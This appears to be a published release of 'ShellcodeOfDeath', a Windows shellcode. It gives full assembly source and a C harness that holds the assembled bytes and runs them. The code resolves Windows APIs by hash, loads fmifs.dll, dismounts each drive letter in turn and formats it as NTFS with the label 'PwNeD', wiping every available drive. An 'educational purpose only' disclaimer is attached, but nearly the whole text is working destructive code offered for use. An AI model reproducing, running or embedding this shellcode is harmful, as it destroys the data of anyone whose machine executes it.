ShellcodeOfDeath has been designed to format all the available drive on Windows. Disclaimer: This shellcode is developed for educational purpose only. The author is not and will not hold any responsibility for any illegal or unauthorized use of #ShellcodeOfDeath. Any use of this shellcode is at the reader’s own risk. Home Page: http://hacksys.vfreaks.com/ Post Link: http://hacksys.vfreaks.com/research/shellcode-of-death.html You may download Shellcode Of Death archive from the above link. ====================================================================== Start Of Code - ShellcodeOfDeath.s ====================================================================== /* * _ __ _____ * /\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___ * / /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \ * / __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | | * \/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_| * |___/ * http://hacksys.vfreaks.com/ * hacksysteam@hotmail.com * * Shellcode Of Death * v1.0 * * Ruei-Min Jiang (@mike820324) a.k.a MicroMike * Ashfaq Ansari (ashfaq_ansari1989@hotmail.com) * * Still a lot can be done to improve this shellcode. This is the first release. * Further, a lot of improvement and optimization can be done to this shellcode. * Any bugs, suggestions or contribution is most welcomed. * * Lenth of shellcode: 387 bytes * Number of NULL byte: 49 * * Notes: There are more NULL bytes due to a fact that few of the Windows API used * accepts input in UNICODE format. Still, NULL bytes can be reduces further. * We can use any simple encoder to xor encode the shellcode and eventually * eliminate NULL bytes. * * Things to do: * 1. Code cleanup * 2. Optimization * 3. Minification * 4. Add suggestions */ .globl _main _main: jmp start_shell; /* * %edx store the base address of kernel32.dll (input) * %ebx points to the start of symbal name table (input) * %ecx contains the destination hash value (input) * %eax is the index_counter (output) */ hash_function: xorl %eax,%eax; next_entry: mov (%ebx,%eax,4), %esi; addl %edx, %esi; push %ebx; push %eax; xor %ebx, %ebx; continue_hash: xor %eax, %eax; lodsb; rol $5, %ebx; addl %eax, %ebx; cmp $0, %eax; jnz continue_hash; ror $5, %ebx; cmp %ecx, %ebx; pop %eax; pop %ebx; je hash_finish; inc %eax; jmp next_entry; hash_finish: ret; /* * input: * set %edx to the dll base address * set %ecx as the hash value you want to compare * output: * %eax is the API address */ get_address: PE_init: movl %edx, %eax; movl 0x3c(%eax), %eax; movl 0x78(%edx, %eax), %eax; leal (%edx, %eax), %eax; pushl %eax; movl 0x20(%eax), %eax; leal (%edx, %eax), %ebx; call hash_function; popl %ebx; movl 0x24(%ebx), %ecx; leal (%edx, %ecx), %ecx; movw (%ecx, %eax, 2), %ax; andl $0x0000ffff, %eax; movl 0x1c(%ebx), %ebx; leal (%edx, %ebx), %ebx; movl (%ebx, %eax, 4), %eax; leal (%edx, %eax), %eax; ret; /* * hash value for each API * LoadLibraryA = 0x331adddc * CloseHandle = 0xd7629096 * CreateFileA = 0xcfb0e506 * ExitProcess = 0xec468f87 * Sleep = 0x567a110 * DeviceIOControl = 0x3b34d4a7 * --------------fmifs.dll--------------- * FormatEx = 0xab025b64 */ start_shell: set_Kernel32_env: xorl %ecx, %ecx movl %fs:0x30, %eax; movl 0xc(%eax), %eax; movl 0x1c(%eax), %eax; next_module: movl 0x8(%eax), %edx; movl 0x20(%eax), %edi; movl (%eax), %eax; cmp 0x18(%edi), %cl; jne next_module; set_hash_table: pushl $0xab025b64; pushl $0x0567a110; pushl $0x3b34d4a7; pushl $0xd7629096; pushl $0xec468f87; pushl $0xcfb0e506; pushl $0x331adddc; movl %esp, %ebp; end_hash_table: set_api_table: init_variable: pushl $7; popl %ecx; xorl %edi, %edi; loop_start: cmp $1, %ecx; jne set_kernel32_api; set_fmifs_env: pushl %ecx; jmp data_string; back_to_here: restore_loadlibrary: movl 0x1c(%esp), %eax; call *%eax; movl %eax, %edx; popl %ecx; set_kernel32_api: pushl %ecx; movl (%ebp, %edi, 4), %ecx; call get_address; popl %ecx; pushl %eax; inc %edi; loop loop_start; movl %esp, %ebp; jmp start_main_code; data_string: call back_to_here; .string "fmifs.dll"; start_main_code: Get_string_addr: jmp 2f; 1:; popl %esi; Format_start_loop: pushl $23; popl %ecx; format_loop_start: movl %ecx, %edi; CreateFile_call: xorl %edx, %edx; pushl %edx; pushl %edx; pushl $3; pushl %edx; pushl $3; pushl $0xc0000000; pushl %esi; movl 0x14(%ebp), %ebx; call *%ebx; Store_File_Handle: pushl %eax; subl $0x4, %esp; xorl %edx, %edx; DeviceIOControl_call: pushl %edx; leal 0x4(%esp), %ebx pushl %ebx; pushl %edx; pushl %edx; pushl %edx; pushl %edx; pushl $0x90020; pushl %eax; movl 0x8(%ebp), %ebx call *%ebx; close_file_handle: pushl 0x4(%esp); movl 0xc(%ebp), %ebx; call *%ebx; FormatEx_call: leal call_back-string_start(%esi),%eax; pushl %eax; pushl $4096; pushl $1; leal volume_label-string_start(%esi), %eax; pushl %eax; leal string2_start-string_start(%esi), %eax; pushl %eax; pushl $0xc; leal 0x8(%esi), %eax; pushl %eax; movl (%ebp), %ebx; call *%ebx; sleep_call: pushl $200; movl 0x4(%ebp), %ebx call *%ebx; loop_end: movl %edi, %ecx addl $1, 0x8(%esi); loop format_loop_start; exit_process: push $0; movl 0x10(%ebp), %ebx; call *%ebx; 2:; call 1b; string_start: .byte 0x5c, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x00, 0x00 string2_start: .byte 0x4e, 0x00, 0x54, 0x00, 0x46, 0x00, 0x53, 0x00, 0x00, 0x00 /* * Volume Label * Set the name of the Volume label * after formatting the respective volume. * Modify volume_label as you desire. * Deafult value -- PwNeD */ volume_label: .byte 0x50, 0x00, 0x77, 0x00, 0x4E, 0x00, 0x65, 0x00, 0x44, 0x00, 0x00, 0x00 call_back: push %ebp; movl %esp, %ebp; xorl %eax, %eax; inc %eax; pop %ebp; ret $0xc; ====================================================================== End Of Code - ShellcodeOfDeath.s ====================================================================== ====================================================================== Testing Shellcode - ShellcodeTestUnEncoded.c ====================================================================== #include #include /* _ __ _____ /\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___ / /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \ / __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | | \/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_| |___/ http://hacksys.vfreaks.com/ hacksysteam@hotmail.com Module Name: Shellcode Test Encoded Abstract: This program is used as a template to test C style formatted shellcodes. A decoder is already added to the final shellcode output. IDE: Dev-C++ 4.9.9.2 (Windows XP SP3) Compiler: gcc 3.4.2 */ unsigned char shellcode[] = "\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50" "\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83" "\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b" "\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c" "\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20" "\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b" "\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff" "\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83" "\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00" "\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b" "\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64" "\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4" "\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46" "\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33" "\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75" "\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89" "\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff" "\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8" "\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64" "\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf" "\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00" "\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83" "\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52" "\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d" "\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff" "\xd3\x8d\x86\x26\x00\x00\x00\x50\x68\x00\x10" "\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50" "\x8d\x86\x10\x00\x00\x00\x50\x6a\x0c\x8d\x46" "\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00" "\x00\x8b\x5d\x04\xff\xd3\x89\xf9\x83\x46\x08" "\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8" "\x7d\xff\xff\xff\x5c\x00\x5c\x00\x2e\x00\x5c" "\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00" "\x54\x00\x46\x00\x53\x00\x00\x00" // Volume Label. You may want to change this. // Default: PwNeD "\x50\x00\x77\x00\x4e\x00\x65\x00\x44\x00" // Volume Label End "\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00"; main() { int i, badchar_c = 0; printf("\n\nShellcode Length: %d\n", sizeof(shellcode)-1); for(i = 0; i < sizeof(shellcode)-1; ++i) { if(((unsigned char *)shellcode)[i] == 0x00) { badchar_c = badchar_c + 1; } } printf("\nNumber of badchar: %d\n\n", badchar_c); printf("\nPress any key to execute shellcode....\n\n"); getch(); int (*ret)() = (int(*)())shellcode; ret(); } ====================================================================== End Testing Shellcode - ShellcodeTestUnEncoded.c ======================================================================